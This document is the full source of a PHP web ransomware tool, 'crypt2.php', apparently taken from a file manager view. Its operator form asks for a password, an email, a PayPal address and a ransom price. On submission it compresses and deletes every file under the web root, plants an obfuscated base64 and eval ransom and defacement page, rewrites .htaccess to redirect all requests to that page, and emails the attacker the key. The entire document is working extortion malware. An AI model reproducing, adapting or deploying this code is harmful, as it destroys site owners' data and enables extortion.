관리-도구

편집 파일: crypt2.php

<title>ransom by system of pekalongan</title> <link rel="shortcut icon" type="image/x-icon" href="https://i.ibb.co/6gXqB7L/Cyto-Xploit-Forum-20191024-104350.jpg"> <style> html { color: red; } input { background: transparent; color: white; border: 1px solid red; } body { background-image: url('https://e.top4top.io/p_1740dg0o00.jpg'); background-repeat: no-repeat; background-size: cover; } </style> <?php error_reporting(0); set_time_limit(0); ini_set('memory_limit', '-1'); if(isset($_POST['pass'])) { function encfile($filename){ if (strpos($filename, '.crypt') !== false) { return; } file_put_contents($filename.".crypt", gzdeflate(file_get_contents($filename), 9)); unlink($filename); copy('.htaccess','.htabackup'); $file = base64_decode("PD9waHANCmVycm9yX3JlcG9ydGluZygwKTsNCiRpbnB1dCA9ICRfUE9TVFsncGFzcyddOw0KJHBhc3MgPSAicm9vdEB4LWtyeXB0MG4teDMxMzM3ODgxMiI7DQppZihpc3NldCgkaW5wdXQpKSB7DQppZihtZDUoJGlucHV0KSA9PSAkcGFzcykgew0KZnVuY3Rpb24gZGVjZmlsZSgkZmlsZW5hbWUpew0KICBpZiAoc3RycG9zKCRmaWxlbmFtZSwgJy5jcnlwdCcpID09PSBGQUxTRSkgew0KICByZXR1cm47DQogIH0NCiAgJGRlY3J5cHRlZCA9IGd6aW5mbGF0ZShmaWxlX2dldF9jb250ZW50cygkZmlsZW5hbWUpKTsNCiAgZmlsZV9wdXRfY29udGVudHMoc3RyX3JlcGxhY2UoJy5jcnlwdCcsICcnLCAkZmlsZW5hbWUpLCAkZGVjcnlwdGVkKTsNCiAgdW5saW5rKCdzeXN0ZW1vZnBla2Fsb25nYW4ucGhwJyk7DQogIHVubGluaygnLmh0YWNjZXNzJyk7DQogIHVubGluaygkZmlsZW5hbWUpOw0KICBlY2hvICIkZmlsZW5hbWUgRGVjcnlwdGVkICEhITxicj4iOw0KfQ0KDQpmdW5jdGlvbiBkZWNkaXIoJGRpcil7DQogICRmaWxlcyA9IGFycmF5X2RpZmYoc2NhbmRpcigkZGlyKSwgYXJyYXkoJy4nLCAnLi4nKSk7DQogICAgZm9yZWFjaCgkZmlsZXMgYXMgJGZpbGUpIHsNCiAgICAgIGlmKGlzX2RpcigkZGlyLiIvIi4kZmlsZSkpew0KICAgICAgICBkZWNkaXIoJGRpci4iLyIuJGZpbGUpOw0KICAgICAgfWVsc2Ugew0KICAgICAgICBkZWNmaWxlKCRkaXIuIi8iLiRmaWxlKTsNCiAgICB9DQogIH0NCn0NCg0KZGVjZGlyKCRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10pOw0KZWNobyAiPGJyPldlYnJvb3QgRGVjcnlwdGVkPGJyPiI7DQp1bmxpbmsoJF9TRVJWRVJbJ1BIUF9TRUxGJ10pOw0KdW5saW5rKCcuaHRhY2Nlc3MnKTsNCmNvcHkoJ2h0YWJhY2t1cCcsJy5odGFjY2VzcycpOw0KZWNobyAnU3VjY2VzcyAhISEnOw0KfSBlbHNlIHsNCmVjaG8gJ0ZhaWxlZCBQYXNzd29yZCAhISEnOw0KfQ0KZXhpdCgpOw0KfQ0KPz4NCjxodG1sPg0KPGhlYWQ+IA0KPHRpdGxlPkhhY2tlZCBCeSByb290QHgta3J5cHQwbi14PC90aXRsZT4NCjxtZXRhIHByb3BlcnR5PSJvZzppbWFnZSIgY29udGVudD0iaHR0cHM6Ly9lbmNyeXB0ZWQtdGJuMC5nc3RhdGljLmNvbS9pbWFnZXM/cT10Ym4lM0FBTmQ5R2NTdWU2YUZPcXM1MExnYkxrR1Z4a1prZW9YWDE5OWlkN0NjOUEmdXNxcD1DQVUiLz48bWV0YSBuYW1lPSJkZXNjcmlwdGlvbiIgY29udGVudD0ieyBFQUggfSIgLz4NCjxtZXRhIG5hbWU9Imdvb2dsZS1zaXRlLXZlcmlmaWNhdGlvbiIgY29udGVudD0iVG91Y2hlZCBCeSByb290QHgta3J5cHQwbi14Ii8+DQo8bWV0YSBuYW1lPSJ0aGVtZS1jb2xvciIgY29udGVudD0iYmxhY2siPg0KPG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9InN5c3RlbSBvZiBwZWthbG9uZ2FuIHdhcyBoZXJlIj4NCjxtZXRhIG5hbWU9ImF1dGhvciIgY29udGVudD0icm9vdEB4LWtyeXB0MG4teCBzeXN0ZW0gb2YgcGVrYWxvbmdhbiIvPg0KPG1ldGEgbmFtZT0ia2V5d29yZHMiIGNvbnRlbnQ9InJvb3RAeC1rcnlwdDBuLXgiLz4NCjxtZXRhIG5hbWU9Im9nOnRpdGxlIiBjb250ZW50PSJZb3UgSGF2ZSBCZWVuIEhhY2tlZCIvPg0KPG1ldGEgcHJvcGVydHk9Im9nOmltYWdlIiBjb250ZW50PSJodHRwczovL2YudG9wNHRvcC5pby9wXzE3NDQyMTJ0MjAuanBnIiAvPg0KPG1ldGEgcHJvcGVydHk9Im9nOnR5cGUiIGNvbnRlbnQ9IndlYnNpdGUiIC8+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KICBib2R5ew0KICAgIGJhY2tncm91bmQtY29sb3I6IGJsYWNrOw0KICAgIH0NCiAgLmNvbnRhaW5lciB7DQogIGhlaWdodDogMTAwJTsNCiAgd2lkdGg6IDEwMCU7DQogIGZvbnQtc2l6ZTogMjVweDsNCiAganVzdGlmeS1jb250ZW50OiBjZW50ZXI7DQogIGFsaWduLWl0ZW1zOiBjZW50ZXI7DQogIGRpc3BsYXk6IGZsZXg7DQogIGNvbG9yOiB3aGl0ZTsNCiAgfQ0KICAubWVzc2FnZSB7DQogICAgY29sb3I6IHdoaXRlOw0KICAgIC13ZWJraXQtYW5pbWF0aW9uOiBmYWRlSW4gMXMgZWFzZS1pbjsNCiAgICBhbmltYXRpb246IGZhZGVJbiAxcyBlYXNlLWluOw0KPC9zdHlsZT4NCjxib2R5Pg0KPGNlbnRlcj48Zm9udCBzdHlsZT0iY29sb3I6d2hpdGU7IHRleHQtc2hhZG93OiByZWQgMnB4IDJweCAycHg7IGZvbnQtc2l6ZTogMjVweDsgZm9udC1mYW1pbHk6IE5vc2lmZXI7Ij5IQUNLRUQ8L2ZvbnQ+PC9jZW50ZXI+DQogIDxicj48YnI+PGJyPg0KICA8Y2VudGVyPjxmb250IHN0eWxlPSJjb2xvcjogcmVkO2ZvbnQtc2l6ZTogMjBweCI+TWVzc2FnZSA6PC9mb250PjwvY2VudGVyPg0KICA8YnI+PGJyPjxicj4NCiAgPGJyPjxicj48YnI+DQogIDxicj48YnI+PGJyPg0KICA8ZGl2IGNsYXNzPSJjb250YWluZXIiPjxkaXYgY2xhc3M9InRleHQiPjwvZGl2PjwvZGl2Pg0KICA8YnI+PGJyPjxicj4NCiAgPGJyPjxicj48YnI+DQogIDxicj48YnI+PGJyPg0KICA8YnI+PGJyPjxicj4NCiAgPGJyPjxicj48YnI+DQogIDxjZW50ZXI+PGZvbnQgc3R5bGU9ImNvbG9yOndoaXRlO2ZvbnQtc2l6ZTogMTVweDsiPnwgWU9VUiA8Zm9udCBzdHlsZT0iY29sb3I6cmVkO2ZvbnQtc2l6ZTogMTVweCI+IFNFQ1VSSVRZPGZvbnQgc3R5bGU9ImNvbG9yOiB3aGl0ZTtmb250LXNpemU6IDE1cHgiPiBJUyBWRVJZPGZvbnQgc3R5bGU9ImNvbG9yOiByZWQ7Zm9udC1zaXplOiAxNXB4Ij4gTE9XIDxmb250IHN0eWxlPSJjb2xvcjp3aGl0ZTtmb250LXNpemU6IDE1cHg7Ij4gfDwvZm9udD48L2ZvbnQ+PC9mb250PjwvZm9udD48L2NlbnRlcj4NCiAgPGJyPg0KPC9ib2R5Pg0KPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KICAgIGNsYXNzIFRleHRTY3JhbWJsZSB7DQogICAgICBjb25zdHJ1Y3RvcihlbCkgew0KICAgICAgICB0aGlzLmVsID0gZWwNCiAgICAgICAgdGhpcy5jaGFycyA9ICc8Pi8/O1tdWystIUAjJCVeJiopKCwufmAnDQogICAgICAgIHRoaXMudXBkYXRlID0gdGhpcy51cGRhdGUuYmluZCh0aGlzKQ0KICAgICAgfQ0KICAgICAgc2V0VGV4dChuZXdUZXh0KSB7DQogICAgICAgIGNvbnN0IG9sZFRleHQgPSB0aGlzLmVsLmlubmVyVGV4dA0KICAgICAgICBjb25zdCBsZW5ndGggPSBNYXRoLm1heChvbGRUZXh0Lmxlbmd0aCwgbmV3VGV4dC5sZW5ndGgpDQogICAgICAgIGNvbnN0IHByb21pc2UgPSBuZXcgUHJvbWlzZSgocmVzb2x2ZSkgPT4gdGhpcy5yZXNvbHZlID0gcmVzb2x2ZSkNCiAgICAgICAgdGhpcy5xdWV1ZSA9IFtdDQogICAgICAgIGZvciAobGV0IGkgPSAwOyBpIDwgbGVuZ3RoOyBpKyspIHsNCiAgICAgICAgICBjb25zdCBmcm9tID0gb2xkVGV4dFtpXSB8fCAnJw0KICAgICAgICAgIGNvbnN0IHRvID0gbmV3VGV4dFtpXSB8fCAnJw0KICAgICAgICAgIGNvbnN0IHN0YXJ0ID0gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNDApDQogICAgICAgICAgY29uc3QgZW5kID0gc3RhcnQgKyBNYXRoLmZsb29yKE1hdGgucmFuZG9tKCkgKiA0MCkNCiAgICAgICAgICB0aGlzLnF1ZXVlLnB1c2goeyBmcm9tLCB0bywgc3RhcnQsIGVuZCB9KQ0KICAgICAgICB9DQogICAgICAgIGNhbmNlbEFuaW1hdGlvbkZyYW1lKHRoaXMuZnJhbWVSZXF1ZXN0KQ0KICAgICAgICB0aGlzLmZyYW1lID0gMA0KICAgICAgICB0aGlzLnVwZGF0ZSgpDQogICAgICAgIHJldHVybiBwcm9taXNlDQogICAgICB9DQogICAgICB1cGRhdGUoKSB7DQogICAgICAgIGxldCBvdXRwdXQgPSAnJw0KICAgICAgICBsZXQgY29tcGxldGUgPSAwDQogICAgICAgIGZvciAobGV0IGkgPSAwLCBuID0gdGhpcy5xdWV1ZS5sZW5ndGg7IGkgPCBuOyBpKyspIHsNCiAgICAgICAgICBsZXQgeyBmcm9tLCB0bywgc3RhcnQsIGVuZCwgY2hhciB9ID0gdGhpcy5xdWV1ZVtpXQ0KICAgICAgICAgIGlmICh0aGlzLmZyYW1lID49IGVuZCkgew0KICAgICAgICAgICAgY29tcGxldGUrKw0KICAgICAgICAgICAgb3V0cHV0ICs9IHRvDQogICAgICAgICAgfSBlbHNlIGlmICh0aGlzLmZyYW1lID49IHN0YXJ0KSB7DQogICAgICAgICAgICBpZiAoIWNoYXIgfHwgTWF0aC5yYW5kb20oKSA8IDAuMjgpIHsNCiAgICAgICAgICAgICAgY2hhciA9IHRoaXMucmFuZG9tQ2hhcigpDQogICAgICAgICAgICAgIHRoaXMucXVldWVbaV0uY2hhciA9IGNoYXINCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIG91dHB1dCArPSBgPHNwYW4gY2xhc3M9ImR1ZCI+JHtjaGFyfTwvc3Bhbj5gDQogICAgICAgICAgfSBlbHNlIHsNCiAgICAgICAgICAgIG91dHB1dCArPSBmcm9tDQogICAgICAgICAgfQ0KICAgICAgICB9DQogICAgICAgIHRoaXMuZWwuaW5uZXJIVE1MID0gb3V0cHV0DQogICAgICAgIGlmIChjb21wbGV0ZSA9PT0gdGhpcy5xdWV1ZS5sZW5ndGgpIHsNCiAgICAgICAgICB0aGlzLnJlc29sdmUoKQ0KICAgICAgICB9IGVsc2Ugew0KICAgICAgICAgIHRoaXMuZnJhbWVSZXF1ZXN0ID0gcmVxdWVzdEFuaW1hdGlvbkZyYW1lKHRoaXMudXBkYXRlKQ0KICAgICAgICAgIHRoaXMuZnJhbWUrKw0KICAgICAgICB9DQogICAgICB9DQogICAgICByYW5kb21DaGFyKCkgew0KICAgICAgICByZXR1cm4gdGhpcy5jaGFyc1tNYXRoLmZsb29yKE1hdGgucmFuZG9tKCkgKiB0aGlzLmNoYXJzLmxlbmd0aCldDQogICAgICB9DQogICAgfQ0KICAgIA0KICAgIGNvbnN0IHBocmFzZXMgPSBbDQogICAgICAndXBzIHlvdXIgd2Vic2l0ZSBpdHMgbWluZScsDQogICAgICAneGl4aXhpIHRoaXMgd2Vic2l0ZSBoYXMgYmVlbiBpbmplY3RlZCByYW5zb213YXJlJywNCiAgICAgICdzeXN0ZW0gb2YgcGVrYWxvbmdhbiB3YXMgaGVyZScsDQogICAgICAnd2hvIHdhcyBoYWNrZWQgeW91ciB3ZWJzaXRlPycsDQogICAgICAnaGFja2VkIGJ5IHJvb3RAeC1rcnlwdDBuLXgnLA0KICAgICAgJ3JlbWVtYmVyIGl0JywNCiAgICAgICd0aHggdG8gOiAnDQogICAgICAnYWxsIG1lbWJlciBzeXN0ZW0gb2YgcGVrYWxvbmdhbicsDQogICAgICAncGVrYWxvbmdhbiBibGFja2hhdCcsDQogICAgICAnZGVzZXB0aWNvbiBwaXJhdGVzIGN5YmVyJywNCiAgICAgICd1bml0ZWQgbWFzdGVyIGN5YmVyJywNCg0KICAgIF0NCiAgICANCiAgICBjb25zdCBlbCA9IGRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoJy50ZXh0JykNCiAgICBjb25zdCBmeCA9IG5ldyBUZXh0U2NyYW1ibGUoZWwpDQogICAgDQogICAgbGV0IGNvdW50ZXIgPSAwDQogICAgY29uc3QgbmV4dCA9ICgpID0+IHsNCiAgICAgIGZ4LnNldFRleHQocGhyYXNlc1tjb3VudGVyXSkudGhlbigoKSA9PiB7DQogICAgICAgIHNldFRpbWVvdXQobmV4dCwgMTUwMCkNCiAgICAgIH0pDQogICAgICBjb3VudGVyID0gKGNvdW50ZXIgKyAxKSAlIHBocmFzZXMubGVuZ3RoDQogICAgfQ0KICAgIA0KICAgIG5leHQoKQ0KICAgIA0KICAgICd1c2Ugc3RyaWN0JzsNCiAgICANCiAgICA8L3NjcmlwdD4NCjwvaHRtbD4="); $q = str_replace('ucUs7', md5($_POST['pass']), $file); $w = str_replace('hraxzd@gmail.com', $_POST['email'], $q); $e = str_replace('paypal.me/CytoRizki', $_POST['paypal'], $w); $r = str_replace('$100', '$'.$_POST['price'], $e); $dec = $r; $comp = "<?php eval('?>'.base64_decode("."'".base64_encode($dec)."'".").'<?php '); ?>"; $cok = fopen('crypt.php', 'w'); fwrite($cok, $comp); fclose($cok); $hta = "DirectoryIndex crypt.php\n ErrorDocument 403 /crypt.php\n ErrorDocument 404 /crypt.php\n ErrorDocument 500 /crypt.php\n"; $ht = fopen('.htaccess', 'w'); fwrite($ht, $hta); fclose($ht); echo "$filename Encrypted !!!<br>"; } function encdir($dir){ $files = array_diff(scandir($dir), array('.', '..')); foreach($files as $file) { if(is_dir($dir."/".$file)){ encdir($dir."/".$file); } else { encfile($dir."/".$file); } } } if(isset($_POST['pass'])){ encdir($_SERVER['DOCUMENT_ROOT']); } copy('crypt.php', $_SERVER['DOCUMENT_ROOT'].'/crypt.php'); copy('.htaccess', $_SERVER['DOCUMENT_ROOT'].'.htaccess'); copy($_SERVER['DOCUMENT_ROOT'].'.htaccess', $_SERVER['DOCUMENT_ROOT'].'.htabackup'); $to = $_POST['email']; $subject = 'Your Ransomware Info'; $message = "Domain : ".$_SERVER['HTTP_ADDR']."\n\n"."Your Password : ".$_POST['pass']; if(mail($to,$subject,$message)) { echo 'Password Saved In Your Mail !!!'; } else { echo 'Password Not In Your Mail !!!'; } exit(); } ?> <center> <h1>Ransomware File encrypt<br>Welcome root@x-krypt0n-x</h1><br> <img height="300" src="https://ctftime.org/media/team/logo_206.png"/> <br><br><h3>Information Server :</h3> Path File : <font color="red"><?php echo $_SERVER['SCRIPT_FILENAME'] ; ?></font><br> Disable Function : <font color="red"><?php $ds = @ini_get("disable_functions"); $show_ds = (!empty($ds)) ? "$ds" : "NONE"; echo $show_ds; ?></font> Mail Function : <font color="red"><?php if(mail('hraxzd@gmail.com','tes','tes')) { echo "ON"; } else { echo "OFF"; } ?></font> <br><Br> <form enctype="multipart/form-data" method="post"> Password Encrypt : <input type="text" name="pass"> Your Email : <input type="text" name="email"> <br><br> Your Paypal Address : <input type="text" name="paypal"> Your Price : <input type="text" name="price"> <br><br> <input type="submit" value="Encrypt"> </form>